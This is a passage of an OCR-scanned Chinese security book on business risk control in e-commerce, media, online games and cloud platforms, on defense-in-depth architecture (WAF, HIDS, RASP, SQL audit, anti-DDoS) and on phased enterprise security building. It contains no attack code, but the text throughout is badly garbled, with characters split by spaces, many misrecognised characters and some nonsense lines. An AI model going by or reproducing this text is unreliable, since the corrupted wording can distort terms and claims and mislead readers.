15.3 HRX 
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时 代 比 较 热 门 ， 因 为 跟 钱 强 相关 ， 所 以 也 促成 了 一 系列 的 业务 安全 问 
题 。 这 一 市 名 为 电 商 ， 实 际 上 把 广义 上 涉及 在 线 交 易 的 都 算 进去 了 ， 比 
如 OTA 在 线 旅游 代理 这 些 都 统统 纳入 电 商 的 范畴 。 


1. 恶 意 下 单 





跟 syn-flood 神 似 ， 拍 下 商品 但 不 付款 ， 骨 在 侵占 库存 ， 一 般 的 对 集 
古 高 峰 时 段 下 单 使 用 验证 码 ， 下 单 后 一 段 时 间 不 付 天 订单 自动 失效 ， 限 
制 下 单 频率 ， 有 风 控 数据 源 可 以 对 恶意 账户 进行 标记 ， 冻 结 下 单 。 








2. 黄 牛 抢 单 


黄牛 一 般 事 前 批量 注册 小 号 ， 抢 购 前 准备 好 抢 单 机 器 人 程序 (黑色 
产业 链 中 间 环 节 也 有 码 农 的 参与 )， 如 图 15-5 所 示 ， 抢 购 开始 时 犹如 遗 
受 了 CC 攻击 。 





图 15-5 ”黄牛 抢 单 








对 于 恶意 养 号 ， 风 控 系 统一 般 会 根据 小 号 、 僵 尸 号 平时 的 行为 与 正 
常 账户 的 区 别 标注 、 登 录 的 途径 、 登 录 地 域 、 登 录 设 备 指纹 、 收 货 地 址 
来 分 类 标记 ， 抢 购 开始 前 残 能 在 账号 层面 冻结 掉 。 








在 活动 开局 前 如 果 抢 单程 序 是 针对 既 有 页 面馆 辑 的 ， 可 以 临时 更 换 
业务 逻辑 使 抢 单 程序 失效 。 在 抢购 过 程 会 使 用 验证 码 做 人 机 识别 。 


3. 刷 优惠 券 和 奖励 





首先 要 在 账号 层面 根据 大 数据 标记 账户 恶意 灰 度 ， 其 次 优惠 券 跟 账 
号 绑 定 ， 无 法 流通 和 交易 。 跟 网 游 中 的 经 济 体系 数值 类 似 ， 建 立 阶梯 模 
型 ， 给 优质 账户 高 额 回馈 ， 给 低 信 誉 账户 小 额 优惠 。 


4. 反 价格 爬虫 


价格 朴 虫 主要 是 竞争 对 手 比价 。 但 凡是 爬虫 就 有 礁 虫 的 特征 ， 比 如 
疏 虫 所 在 的 卫 段 ， 同 时 讨 虫 不 是 正常 的 浏览 器 ， 可 能 不 会 解析 
JavaScript， 缺 少 正常 的 浏览 器 客户 端 行为 和 通信 ， 所 以 通过 这 个 做 人 机 
识别 跟 DDoS 中 的 CC 攻击 有 点 类 似 。 


5. EK VE 


根据 账户 注册 信息 的 真实 性 、 登 录 设 备 的 真实 性 、 绑 卡 异 常 、 账 号 
异常 ， 结 合 自 有 或 第 三 方 历史 征 信 数据 综合 判断 欺诈 的 可 能 性 。 依 赖 于 








大 数据 的 反 欺诈 对 数据 源 的 要 求 比较 高 ， 绝 大 多 数 中 小 企业 目 建 数据 源 
不 太 具 有 可 行 性 ， 初 期 还 应 该 依仗 大 平台 开放 的 基础 数据 能 力 做 定制 分 
析 ， 并 逐步 积 昧 上 自己 的 业务 数据 ， 等 自身 业务 数据 积累 到 一 定 规模 时 再 
考虑 目 建 风 控 机 制 。 





6.45 AYE 


aE ALAR, THR. Ale See ae PRICE 
API 小 用 、 供 应 链 上 下 游 信 息 泄 露 , “内 鬼 ”* 忽 售 内 部 数据 。 


目前 隐私 保护 在 国内 疝 不 成 气候 ， 很 多 公司 有 安全 开发 标准 ， 却 没 
有 隐私 保护 标准 ， 所 以 对 数据 的 分 类 分 级 ， 加 密 脱 敏 等 几乎 没有 通用 的 
约束 。 而 对 客户 元 数据 的 访问 权限 ， 凡 部 的 信息 安全 管理 ， 基 本 上 都 只 
有 成 熟 的 大 公司 才 会 考虑 。 

















对 于 野 蛋 成 长 期 的 创业 型 公司 强调 这 个 可 能 有 扣 难 ， 但 对 于 已 有 安 
全 团队 的 企业 ， 这 应 该 纳入 安全 负责 人 的 视野 之 中 。 


交易 风 控 依赖 于 几 个 方面 : 


D 账户 安全 


账号 安全 中 部 分 


2) 客户 端 安全 
Sey fi, 

‘LAR 

3) 认证 机 制 
-证书 PKI 

- 令 牌 

多 因素 认证 

4) 风险 评估 
账户 历史 行为 
-账户 历史 征 信 数 据 
-交易 和 账户 异常 
-漏斗 模型 筛选 ， 机 器 规则 + 人 工 审 核 


交易 风 控 在 传统 安全 (包括 认证 、 账 户 、KMS、PKI、 客 户 端 完整 
性 等 ) 基础 上 还 需要 由 3 大 组 成 部 分 : 


-用户 数 据 、 交 易 数 据 。 


:来 自传 统 金融 行业 的 风险 管理 。 





基于 大 数据 的 风 控 平台 。 


交易 风 控 团队 需要 两 拨 人 : 一 拨 来 目 传统 金融 行业 ， 一 拨 来 自 互联 


154 |) Bee 


KNARE E, BEBKA ie, ATCA H HABER) 
效果 、 实 际 订单 效果 收费 ， 以 前 的 CPM、CPC 模 式 都 不 行 ， 基 本 都 是 
CPA 为 主 ， 但 是 即便 是 CPA， 广 告 联盟 有 时 候 还 是 跟 黑 产 玩 一 样 的， 会 
假装 正常 用 户 注册 登录 然后 充值 ， 甚 至 小 量 消 费 ， 只 要 这 些 充 值 消费 低 
于 和 它 所 获取 的 广告 费 它 就 是 赚 的 ， 因 此 对 于 这 类 行为 的 打假 也 需要 依靠 
账号 标签 以 及 对 用 户 行 为 模式 的 数据 分 析 来 获取 。 








15.5 ”媒体 类 


媒体 类 的 问题 主要 是 黄 财 毒 、 与 情 安全 。 基 础 的 手段 包括 : 敏感 字 
过 滤 、 设 置 举报 功能 、 加 上 人 工 审 核 。 高 级 的 手段 本 质 上 就 是 搜索 引擎 
的 技术 : 抓 取样 本 ， 用 机 器 学 习 的 方法 做 特征 识别 。 


15.6 ”网 游 类 


游戏 行业 除了 盗号 盗 充 外 ， 最 主要 的 问题 就 是 反 外 挂 、 私 服 、 打 金 
工作 室 。 总 结 一 下 有 几 个 层面 的 保护 手段 : 





客户 问 一 一 对 于 flash 等 瘦 客 户 端 最 主要 的 技术 是 代码 混淆 ， 用 于 
对 抗 反 编译 后 逆向 游戏 的 逻辑 和 网 络 协议 。 对 于 大 型 客户 端 游戏 ， 对 抗 
的 方式 主要 是 加 密 加 充 ， 以 及 各 种 二 进 制 反 调试 手段 。 








网络 封包 一 一 对 抗 重 放 型 攻击 ， 具 体 实现 方式 可 以 参考 大 多 数 rest 
API 的 安全 设计 如 何 防止 packet replay 攻 击 ， 原 理 基 本 类 似 。 











服务 剖 校 验 一 一 把 大 部 分 逻辑 验证 放 在 服务 端 ， 同 时 校 验 时 钟 同 
步 等 。 
:人 机 识别 一 一 通过 定期 弹出 验证 码 或 回答 问题 实现 前 端的 人 机 识 


别 ， 后 端 根据 地 图 移动 轨迹 ， 鼠 标 轨迹 ， 物 品 使 用 速度 等 做 人 机 识 列 。 


产品 内 容 设 计 一 一 物品 与 账号 绑 定 ， 如 图 15-6 所 示 ， 随 时 间 降 低 收 
， 内 部 经 济 平 衡 数 值 体系 ， 游 戏 内 产 出 利益 分 配 倾 向 性 等 对 抗 打 金 工 
作 室 对 游戏 内 部 环境 的 污染 。 


Ek 


运营 数据 监控 一 一 通过 运营 数据 ， 如 虚拟 装备 产 出 数量 ， 个 人 成 


私服 一 一 主要 的 根源 在 于 供应 链 管理 ， 研 及 到 运营 的 交付 过 程 ， 
研发 的 信息 安全 管理 ， 运 营 平 台 的 防 黑 建设 ， 研 发 团队 集体 跳槽 的 知识 
产权 保护 ， 主 创 人 员 敏感 异 动 预警 ， 竞 业 协 议 ， 保 密 协 议 等 。 





安全 模式 


为 了 更 好 的 保护 广大 玩家 的 虚拟 物品 安全 ， 我 们 推出 了 新 的 安全 策略 

` 脆 讯 游 戏 安全 模式 ” 当 您 的 帐号 处 于 高 风险 状态 时 ， 和 将 会 自动 进入 
安全 模式 。 在 此 模式 下 ， 您 的 帐号 不 可 进行 包括 交易 、 丢 弃 、 销 山 在 
内 的 所 有 涉及 到 帐号 虚拟 物品 的 操作 ~ 


帐号 异常 查询 > ”解除 安全 模式 > 





图 15-6 ”网 洲 中 的 虚拟 物品 绑 定 


游戏 是 将 互联 网 用 户 流 量 转化 为 金钱 变现 能 力 最 强 的 业务 ， 故 而 黑 
产 的 分 工 也 比较 成 熟 ， 所 以 对 抗 上 也 需要 各 种 情报 ， 她 且 不 去 加 上 威胁 
情报 的 大 帽子 了 ， 这 是 一 个 需要 发 动 广大 群众 进行 持久 对 抗 的 大 谍 题 。 





15.7 云 计 算 





这 里 站 在 云 计算 平台 厂商 的 角度 来 看 ， 而 不 是 站 在 租户 的 立场 上 看 
的 。 主 要 问题 是 CaaS (Crime as a service) ， 云 平台 被 当做 犯罪 的 场 
所 ， 除 黄 赌 毒 外 ， 很 多 虚拟 机 实例 被 植 入 木马 变 成 “ 养 鸡 场 "，” 伪 性 网络 
的 集中 地 ， 频 繁 的 DDoS 其 他 IDC， 或 用 于 暴利 密码 破解 等 网 格 计算 行 
为 。 





对 于 云 平台 的 监管 ， 一 方面 手 不 能 伸 得 太 长 ， 触 及 用 户 隐 私 数据 ， 
一 方面 又 要 做 治理 。 对 于 租户 使 用 云 平台 开展 黄 赌 毒 业务 的 ， 可 以 参考 
媒体 类 的 解雇 方案。 而 “ 养 鸡 场 "这 类 问题 ， 纯 粹 是 一 个 租户 级 的 整体 安 
全 防护 能 力 ， 基 于 网 络 的 异 当 流量 分 析 。 对 于 使 用 云 资源 跑 彩 虹 表 叉 不 
公开 提供 服务 的 行为 而 言 ， 目 前 似乎 没有 太 好 的 检测 手段 。 

云 计 算 作为 一 个 公共 平台 ， 上 层 业 务 可 能 会 履 凋 全 行业 全 类 型 ， 沙 
生 的 问题 可 能 层出不穷 ， 在 提供 安全 解决 方案 以 外 ， 如 何 为 租户 的 风 控 
提供 便利 是 一 个 长 期 而 有 挑战 的 课题 。 








第 16 草 ”大 规模 纵深 防御 体系 设计 与 实现 


技术 篇 中 对 大 型 互联 网 生产 网 络 的 安全 解决 方案 分 类 进行 了 描述 ， 
但 对 于 具体 公司 的 安全 建设 如 何 上 手 可 能 很 多 人 还 是 缺乏 对 整体 架构 和 
切入 点 的 认 知 ， 本 章 通 过 具体 的 例子 展示 如 何 进行 整体 化 安全 建设 ， 以 
及 从 哪里 入 手 由 点 和 带 面 的 布局 ， 并 最 终 实现 体系 化 建设 需要 的 大 部 分 任 
务 。 





16.1 设计 方案 的 考虑 


检测 和 防护 的 角色 


很 多 人 提 到 一 个 问题 , “既然 是 纵深 防御 ， 好 像 入 侵 检测 的 部 分 后 
多 ， 而 防护 的 部 分 比较 少 ”， 这 确实 是 目前 大 型 互联 网 安全 体系 的 现 
状 。 因 为 安全 手段 要 适应 业务 ， 必 须 有 所 妥协 ， 而 不 能 只 以 安全 效果 最 
大 化 来 衡量 。 所 以 本 着 为 业务 让 路 的 原则 ， 最 后 就 变 成 检测 手段 很 多 ， 
阻 断 手段 一 般 不 轻易 用 。 在 BAT 这 样 的 业务 模式 中 ， 广 义 上 的 Web 服 务 
占 了 绝 大 多 数 ， 所 以 很 多 场景 下 阻 断 的 安全 手段 就 变 成 了 WAF， 除 了 
WAF 之 外 似乎 就 找 不 到 太 多 的 带 有 强 阻 断 性 质 的 安全 产品 了 ， 所 以 最 
后 给 入 留 下 一 个 除了 WAF 剩 下 的 都 是 检测 类 安全 产品 的 印象 。 客 观 一 
点 说 ， 如 果 你 熟悉 甲 方 的 安全 建设 ， 阻 断 也 并 不 只 有 WAF 这 个 单一 的 
角色 ， 所 谓 防护 是 由 一 系列 手段 厨 加 后 的 效果 ， 包 括 但 不 仅 限 于 如 下 手 


Be: 

















安全 域 划分 /VPC/VLAN 隔 离 。 
.OS 加 回 ， 比 如 目录 的 wrx 权 限 ，cgroup+namespace+chroot。 
.最 前 端的 抗 DDoS 防护 。 


.4 层 防 火 墙 的 过 滤 。 


最 终 检 测 手 段 表现 为 一 个 个 相对 独立 的 产品 形态 ， 而 防护 则 更 多 以 
零散 的 手段 分 布 于 各 处 。 


1. 数 据 流 视角 


在 理论 篇 中 提 到 过 大 型 互联 网 入 侵 感知 和 防御 体系 的 思路 类 似 于 从 
各 个 维度 采集 数据 然后 用 大 数据 (包含 机 器 学 习 的 方式 ) 最 终生 成 攻击 
告警 信息 。 图 16-1 展 示 了 常见 的 入 侵 感知 数据 源 采 集 的 维度 ， 对 应 的 是 
生产 网 络 环境 ， 而 非 办 公 网 络 环境 。 







Module WAF 
oe aò o 服务 器 模块 ki 
n Ah ESEN a 旁边 WAF 集群 静态 规则 
a , 传统 BI 应 对 数据 规模 问题 
内 核 态 检测 H 
¥ 





机 器 学 习 
以 检测 异常 为 思路 
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图 16-1 第 见 入 侵 感知 数据 源 采集 的 维度 


这 些 数据 维度 包括 : 


1) 网 络 (安全 ) 设备 : 防火 墙 、 WAF、NIDS， 在 大 型 IDC 环 境 中 
这 些 产 品 的 形态 可 能 不 一 定 是 “盒子 ”， 而 是 分 布 式 软件 ，module 或 agent 


的 形式 。 








2) OS 层 : HIDS 数 据 ， 系 统 原生 日 志 ， 以 及 应 用 层 日 志 。 





3) 运行 时 环境 : 例如 JVM、Zend 等 解释 器 的 定制 日 志 ， 在 形式 上 
它 也 属于 OS 层面 可 以 采集 的 数据 。 











4) 数据 层 : 对 应 的 是 数据 库 、 缓 存 以 及 大 型 的 分 布 式 数据 库 中 间 
件 代 理 所 产 生 的 访问 和 安全 告警 。 


5) 漏洞 信息 : 由 网 络 扫描 需 或 主机 本 地 agent 搜 集 的 漏洞 信息 。 


6) 资产 和 配置 管理 数据 : iplist 等 属于 基础 数据 ， 如 果 这 类 数据 不 
正确 ， 对 于 多 维度 数据 关联 以 及 发 现 问题 后 的 处 理 流 程 都 有 很 大 的 障 


hto 





这 张 图 里 没有 标识 出 来 的 实际 上 还 有 另外 一 部 分 : 第 三 方 威胁 情报 
数据 《例如 卫 信 誉 、 恶 意 域名 和 灰色 URL 等 ) 。 但 据 笔 者 观察 ， 大 多 数 
企业 的 安全 建设 还 没有 成 熟 到 对 第 规 维度 的 数据 榨 干 的 地 步 ， 所 以 威胁 
情报 这 部 分 通常 没有 被 放 在 紧急 且 重 要 的 位 置 。 





2. 服 务 占 视角 


从 更 加 具体 化 的 服务 需 部 车 视 角 来 看 ， 以 Web 服 务 环境 下 的 各 个 功 
能 服务 器 为 例 ， 描 述 安 全 产品 部 嗜 的 选择 性 问题 ， 因 为 并 不 是 所 有 的 服 
务 器 都 需要 干 篇 一 律 地 部 署 所 有 的 安全 产品 。 








图 16-2 是 一 个 抽象 的 大 中 型 Web 服 务 架 构 ， 通 常 SLB 软 件 负 载 均衡 
E) 可 能 会 同时 充当 一 些 WAF 的 角色 ， 需 要 装载 对 应 的 WAF 模 块 和 
人 机 识别 模块 〈 采 集 业 务 安 全 数据 ) ， 后 端的 App server 应 用 服务 器 ， 
例如 Java 或 PHP 或 node.js 等 本 身 首 先是 一 个 Linux OS 环 境 ， 需 要 HIDS 主 
机 层 的 入 侵 检 测 ， 其 次 因为 有 应 用 跑 在 上 面 ， 所 以 需要 RASP 运 行 时 环 
境 的 沙 箱 模块 ， 一 般 情 况 下 还 需要 一 个 大 数据 日 志 采 集 的 agent 用 于 收集 
系统 和 应 用 层面 的 实时 日 志 (Flume 是 一 款 流行 的 大 数据 agent) ，HIDS 
所 采用 的 数据 通道 和 Flume 是 否 通 过 自 研 手 段 合 并 成 一 个 agent 并 不 是 这 
个 问题 的 关键 ， 这 里 是 用 来 说 明 需 要 实现 哪些 功能 。 再 后 面 的 中 间 件 不 
是 一 个 直接 对 外 暴露 的 服务 ， 更 多 关注 系统 的 自身 状态 是 否 存在 入 侵 可 
疑 ， 所 以 需要 HIDS 和 一 个 大 数据 日 志 收 集 agent， 如 果 后 端 是 关系 型 数 
据 库 ， 使 用 的 是 非 私 有 SQL 协 议 ， 则 可 以 在 这 里 加 载 SQL 审 计 模 块 〈 形 
式 上 可 能 是 挂 在 旁 路 ) ， 如 果 使 用 的 是 私有 协议 ， 则 可 以 考虑 把 SQL 审 
计 改 成 接口 调用 审计 。 最 后 面 的 数据 库 关 注 的 也 是 操作 系统 本 身 是 否 被 
渗透 ， 同 样 也 是 一 个 HIDS 和 一 个 大 数据 的 agent。 通 过 这 些 不 同 功能 服 
务 器 上 的 数据 采集 点 ， 构 成 入 侵 感知 的 数据 来 源 。 
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图 16-2” 大 中 型 Web 服 务 架 构 示意 图 


3.IDC 视 角 


是 否 涉 及 这 个 视角 纯粹 取决 于 规 柑 ， 业 务 规模 稍微 大 一 点 束 会 目 然 
这 扯 到 跨 IDC， 跨 全 球 区 域 这 些 问题 。 安 全 感知 对 应 的 技术 架构 也 会 随 
业务 形态 产生 相应 的 变化 。 有 基体 到 实现 一 般 是 “跟随 ” 运 维基 础 架构 ， 运 
维 如 果 是 采用 多 中 心 分 治 原则 ， 则 安全 的 数据 也 不 会 刻意 妃 求 到 最 终 的 
上 聚 点 进行 聚合 。 但 一 般 情 况 下 ， 为 了 兼顾 多 维度 数据 关联 的 准确 性 ， 
会 使 用 多 级 日 志 聚 合 到 一 个 中 心计 算 节 后， 如 图 16-3 所 示 ， 在 最 终 数 据 
集 上 生成 攻击 检测 告警 。 











对 于 涉及 敏感 国家 和 地 区 受 限 于 数据 保护 遵从 与 合 规 性 需求 时 ， 可 
适当 采用 区 域 分 治 原则 ， 使 所 在 region 的 安全 大 数据 在 本 region 内 计算 完 
毕 ， 不 路 region 传 输 。 


4 逻辑 攻防 视角 


从 抽象 的 纯 攻 防 视 角 如 图 16-4 所 示 ， 对 于 企业 的 生产 网 络 而 言 ， 最 
外 围 的 威胁 如 下 : 1) 4 层 流量 型 DDoS; 2) DNS 竣 痪 ，3) 链 路 劫持 。 
对 应 最 外 层 的 主要 防御 手段 是 抗 DDoS。 
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图 16-3 ”IDC 视角 





图 16-4 逻辑 攻防 视角 


抗 DDoS 之 后 的 第 一 道 防 御 模 型 是 快速 收敛 入 口 ， 减 小 攻击 面 ， 通 
常 的 手段 是 4 层 防火 墙 ，5 元 组 ACL 过 滤 或 利用 Web 服 务 的 反 向 代理 只 对 
外 开放 TCP 80 等 主要 服务 端口 ， 其 余 全 部 对 互联 网 禁止 。 


在 4 层 协议 过 滤 之 后 ， 攻 防 模 型 进入 第 7 层 应 用 层 协 议 对 抗 ，1) 
HTTP/HTTPS 协 议 ， 防 御 手 段 是 WAF; 2) 非 HTTP 协 议 ， 主 要 使 用 
NIDS， 在 节约 成 本 的 前 提 下 也 可 以 省 略 这 个 措施 转 而 采用 服务 加 回 和 
强 审 计 的 方式 做 妥协 方案 ，3) CC 等 7 层 DDoS 攻击 ， 使 用 7 层 的 抗 DDoS 


做 人 机 识别 ， 通 币 是 类 似 WAF 的 软件 模块 。 





在 7 层 协议 的 更 后 端 是 应 用 代码 的 运行 时 状态 ， 这 个 层次 比 7 层 的 
CGI 更 底层 ， 在 比较 大 规模 的 生产 环境 中 ， 一 般 以 检测 webshel] 为 主 ， 
在 小 规模 环境 下 可 以 采取 相对 重度 的 方式 用 RASP 模 块 检 测 OWASP TOP 
10 漏 洞 中 的 大 多 数 类 型 。 





再 往 后 的 攻击 模型 ， 介 于 应 用 层 攻 击 到 系统 层 攻击 之 间 ， 包 括 : 直 
达 数 据 库 的 恶意 攻击 〈SQL 注 入 或 拖 库 ) ，SSH 的 暴力 人 破解， 直接 调用 
系统 命令 但 仍 未 获得 完全 系统 权限 的 webshell 指 令 执行 ， 对 应 的 防御 模 
型 抽象 为 SQL 审计 、 系 统 日 志 分 析 、webshell 检 测 。 











在 攻击 链 的 末端 ， 最 后 一 层 攻 击 模型 是 获取 系统 权限 ， 防 御 者 模型 
则 是 检测 提 权 和 rootkit， 对 应 的 解决 方案 通常 是 HIDS 的 功能 。 到 这 里 基 
本 完成 了 入 侵 过 程 的 全 部 对 抗 。 虽 然 从 攻击 的 角度 看 攻击 还 没完 ， 但 后 
面 的 横 癌 渗透 等 攻击 所 对 应 的 防御 模型 也 基本 都 亩 兰 在 前 述 的 层次 逻辑 
ZH 


16.2 不 同 场景 下 的 裁剪 


以 上 “全 套 ” 设 计 对 于 大 多 数 企 业 而 言 还 是 太 贵 了， 在 业务 规模 和 安 
全 投入 没有 达到 理想 化 水 平 之 前 ， 只 能 做 一 些 妥 协和 裁剪 ， 但 是 这 种 裁 
剪 还 是 要 退 求 有 限 安 全 总 投入 《〈 钱 、 人 员 编 制 ， 内 部 支撑 团队 ) 水平 下 





1.IDC 规 模 大 小 的 区 别 





对 裁剪 影响 最 大 的 便 是 IDC 规 模 ， 因 为 它 决 定安 全 的 总 投入 。 极 站 
一 点 说 小 网 站 弄 个 modsecurity 或 naxsi， 装 个 OSSEC 就 完事 了 ， 哪 还 用 得 
着 这 么 复杂 。 然 而 对 于 绝 大 多 数 既 称 不 上 海量 ， 又 不 那么 小 的 平台 来 
说 ， 可 以 有 很 多 省 钱 的 渠道 ， 比 如 : 





D 4 层 抗 DDoS 的 成 本 很 高 ， 不 一 定 要 目 己 去 建 这 种 能 力 ，7 层 抗 
DDoS 也 可 依赖 于 第 三 方 ， 仅 仅 是 不 要 对 效果 有 过 分 的 期 望 。 


2) 如 宁 没 有 条 件 做 网 络 分 光 ， 那 就 干脆 筷 了 这 事 吧 ， 扫 描 堪 +Web 


3) 自 研 Hids 是 奢侈 品 ， 如 果 你 的 公司 市 值 尚 未 超过 100 亿 美元 ， 建 
议 还 是 用 现成 的 开源 产品 ， 比 如 OSSEC 或 者 OSquery。 


4) RASP 也 是 个 奢侈 品 ， 衡 量 的 标准 是 如 果 你 WAF 尚 且 不 能 很 好 
HBA, LANE FERASP 了， 当然 规模 比较 小 ， 对 并 发 性 能 要 求 不 苗 
刻 的 业务 环境 ， 花 钱 买 商业 产品 也 是 一 种 思路 。 


5) SQL 审计 也 有 点 小 奢侈 ， 如 果 你 在 CGI 层 能 有 比较 大 的 目 信 和 解决 
SQL 注入 问题 ， 那 也 可 以 忽略 这 个 产品 。 


2. 不 同 的 业务 类 型 


如 果 业 务 流 量 中 大 部 分 都 是 HTTP 类 型 的 ， 那 么 应 该 重点 投入 
WAF、RASP 和 Web 扫 描 器 ，NIDS/NIPS 可 以 省 略 ， 如 果 有 条 件 搞 
HIDS， 应 该 优先 关注 用 户 态 检测 ， 比 如 webshell 和 提 权 。 


如 果 非 HTTP 协 议 例 如 SSH、MySQL 等 通用 协议 而 非 私 有 协议 占 多 
数 ， 网 络 的 部 分 可 以 考虑 NIDS， 数 据 库 部 分 可 以 使 用 SQL 审 计 。 如 果 
消息 接口 、 远 程 过 程 调 用 、 数 据 缓存 和 持久 化 中 私有 协议 占 多 数 ， 则 不 
用 考虑 NIDS 和 SQL 审计 ， 而 应 转向 HIDS， 私 有 协议 对 入 侵 者 来 说 是 一 
道门 槛 ， 被 渗透 的 概率 不 高 ， 所 以 更 多 关注 操作 系统 本 身 就 行 。 对 于 大 
量 的 非 Web 业 务 ， 例 如 很 多 存储 节点 ， 也 只 需要 关注 操作 系统 的 入 侵 ， 
更 多 的 在 HIDS 上 投入 ， 重 点 在 后 门 程序 和 Rootkit 检 测 。 




















3. 安 全 感 的 底线 





无 论 如 何人 退 求 性 价 比 ， 安 全 感 总 是 有 一 个 底线 的 ， 在 生产 网 络 的 安 


全 管理 中 ， 这 个 底线 就 是 : 


1) 入 侵 者 能 随意 操纵 数据 库 / 用 户 数据 《〈 不 一 定 需要 数据 库 权 限 ， 
也 不 一 定 需 要 系统 的 root 权 限 ) 。 





2) 渗透 到 达 了 操作 系统 这 一 层 (得 到 shell 了 ， 无 论 是 普通 用 户 还 


是 root) 。 





作为 防御 方 我 一 定 要 对 上 述 两 种 情况 有 所 掌控 ， 最 起 码 在 这 两 个 坏 
市 上 具备 一 定 的 入 侵 感 知 能 力 ， 不 至 于 发 生 了 如 此 严重 的 事情 还 是 没有 
半点 告警 。 对 应 在 整体 方案 上 无 论 如 何 裁 筋 ， 在 安全 团队 的 能 力 不 是 特 
别 惨淡 的 情况 下 ， 还 是 尽 可 能 地 在 数据 库 ( 或 DAL， 数 据 访问 层 ) ME 
机 这 两 个 层面 设防 。 











第 17 草 ”分 阶段 的 安全 体系 建设 


理论 篇 中 提 过 安全 体系 建设 是 一 个 分 阶段 逐步 推进 的 过 程 ， 本 章 就 
这 一 过 程 应 如 何 分 解 以 及 分 解 后 的 重要 部 分 展开 描述 。 


17.1 ”宏观 过 程 


企业 的 安全 体系 建设 是 一 个 从 “0” 到 “1” 的 过 程 ， 这 种 过 程 采 用 分 步 
走 战略 ， 图 17-1 展 现 了 安全 整体 建设 的 “次 第 ”。 











在 纵深 防御 建立 起 来 之 前 ， 是 不 是 被 动 换 打 昵 ， 显 然 不 是 的 。 你 需 
要 做 一 些 基础 的 事情 ， 最 大 化 的 止 损 ， 虽 然 有 些 事情 看 起 来 很 镜 单 ， 却 
往往 是 安全 事件 的 根源 。 所 以 第 一 阶段 是 基础 安全 策略 的 实施 ， 这 一 部 
分 看 上 去 不 那么 高 大 上 ， 却 是 ROI 最 高 的 部 分 。 这 一 部 分 大 多 属于 整改 
项 ， 不 需要 太 多 额外 的 投入 就 可 以 规避 80% 的 安全 问题 ， 即 使 一 个 企业 
没 太 多 安全 预算 ， 做 不 到 全 线 业务 实时 入 侵 感知 ， 也 能 有 一 个 底线 的 基 
础 保障 ， 这 一 阶段 总 体 上 属于 “ 包 r 不 死 ”。 








第 二 阶段 是 进入 系统 性 建设 ， 也 就 是 第 二 篇 中 涉及 的 各 个 维度 的 安 
全 防御 手段 。 入 侵 检 测 等 ， 除 了 技术 上 ， 还 包括 流程 和 审计 需求 。 这 是 
一 个 相对 体系 化 的 私 形 ， 对 于 不 是 特别 大 的 互联 网 公司 而 言 ， 开 源 软件 
+ 商业 解决 方案 一 般 可 以 应 付 。 在 这 个 阶段 ， 如 果 对 象 是 大 型 互联 网 公 
司 ， 则 应 该 直接 进入 目 研 之 路 ， 同 步 开 始 研发 安全 产品 ， 例 如 HIDS、 
大 数据 平台 等 ， 目 研 迟 早 是 一 个 无 法 回避 的 现实 需求 。 
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图 17-1 ”安全 整体 建设 的 框架 


第 三 阶段 ， 系 统 化 建设 ， 安 全 运 维和 SDL 成 体系 之 后 ， 可 以 选择 性 
关注 业务 安全 的 问题 。 通 各 以 账号 安全 为 切入 点 ， 之 后 选择 主 营 业务 中 
风险 最 大 的 开 流 程 活动 做 相关 的 业务 风险 分 析 和 业务 风 控 体系 建设 。 


当 安 全 运 维 、 产 品 安全 (SDL) 、 业 务 安 全 都 初步 成 体系 之 后 是 不 
是 安 全 的 整体 建设 就 算 完 了 呢 ? 显然 不 是 。 有 这 些 点 和 面 只 能 说 是 有 了 
骨架 ， 顶 多 只 能 算 一 层 厚 注 不 均 的 防御 网 ， 注 弱点 仍然 容易 修 穿 透 ， 因 
此 接 下 来 的 工作 是 进入 运营 环节 ， 也 就 是 所 谓 的 PDCA 的 工作 ， 把 每 一 
个 防御 点 打磨 到 极致 。 这 一 部 分 工作 很 重要 ， 但 属于 非 前 人 台 可 见 的 “内 
功 ”， 可 能 不 容易 受到 管理 者 的 重视 ， 但 安全 的 Leader 上 自己 要 清楚 利害 
关系 ， 如 何在 这 部 分 工作 投入 资源 和 量化 对 应 的 KPI 产 出 是 需要 考虑 的 














问题 。 


最 后 一 个 层次 ， 当 以 上 点 和 面 的 建设 都 打磨 得 差不多 的 时 候 ， 安 全 
建设 进入 “ 目 由 发 挥 区 间 ”， 这 个 区 间 做 的 事 往 往 跟 平 台 的 经 营 状 况 ， 业 
务 的 市 场地 位 ， 业 务 的 全 球 化 属性 有 很 大 的 关系 ， 已 经 无 法 给 这 个 区 间 
的 事情 贴标签 ， 但 也 有 一 些 可 遵循 的 参考 物 ， 比 如 对 标 业 界 领导 厂商 。 


对 整体 的 建设 次 第 有 了 大 致 的 介绍 后 ， 下 面 对 一 些 关键 环节 做 进 一 


步 描述 。 


17.2 ”清理 灰色 地 带 


以 下 列举 了 一 些 常 见 的 安全 诉求 ， 最 初始 的 阶段 部 雷 要 解决 这 些 问 


和 一 阶段 : 


1) 资产 管理 的 灰色 地 带 ( 例 如， 资产 管理 系统 数据 不 准确 ， 运 维 
和 安全 都 不 知道 线 上 有 某 个 PP， 遗漏 了 安全 检查 和 监控 ， 一 批 新 采购 的 
服务 器 因为 业务 侧 的 紧急 扩容 需求 急 急 忙 忙 上 线 ， 漏 掉 了 安全 扫描 ， 诸 
如 此 类 的 ) 。 





2) 安全 措施 的 履 羡 率 和 健康 状态 ， 例 如 HIDS 的 安装 履 盖 率 ， 边 缘 
IDC 节 点 的 服务 器 是 否 有 ; 即使 有 ， 是 不 是 在 运行 状态 ， 还 是 agent 
down 了 也 不 知道 。 








3) ACL 的 有 效 性 。 例 如 ， 为 调试 菜 个 应 用 开 了 条 临时 策略 ， 事 后 
is SUAS; iptables 的 规则 因为 各 种 未 知 的 原因 突然 失效 了 ， 导 致 全 端 
Hay ila]. 

这 些 问 题 涉 及 配置 管理 、 上 下 线 流程 、 安 全 监控 的 范畴 ， 所 以 在 流 


程 和 技术 上 都 需要 审查 。 另 一 方面 即使 有 了 流程 也 不 完全 可 依赖 ， 因 为 
基于 人 的 流程 是 会 犯错 的 ， 基 于 机 器 的 流程 才 稍 微 可 信和 点 。 举 个 例子 ， 


公司 定义 了 业务 发 布 前 的 上 线 安全 检查 这 个 流程 ， 但 是 业务 方 在 发 布 前 
未 记 知 会 到 安全 部 门 漏 择 了 这 个 环节 ， 最 后 还 是 一 个 坏 的 结果 ， 安 全 问 
题 往往 因为 这 种 低级 错误 ， 而 并 非 是 因为 没有 高 大 上 的 入 侵 感 知 。 











Pele 一 N 


第 二 阶段 : 
1) 清理 远程 登录 弱 口 令 。 


2) 清理 Web 应 用 : SQL 注入 、 文 件 上 传 点 ，struts2 等 RCE 漏 洞 ， 管 
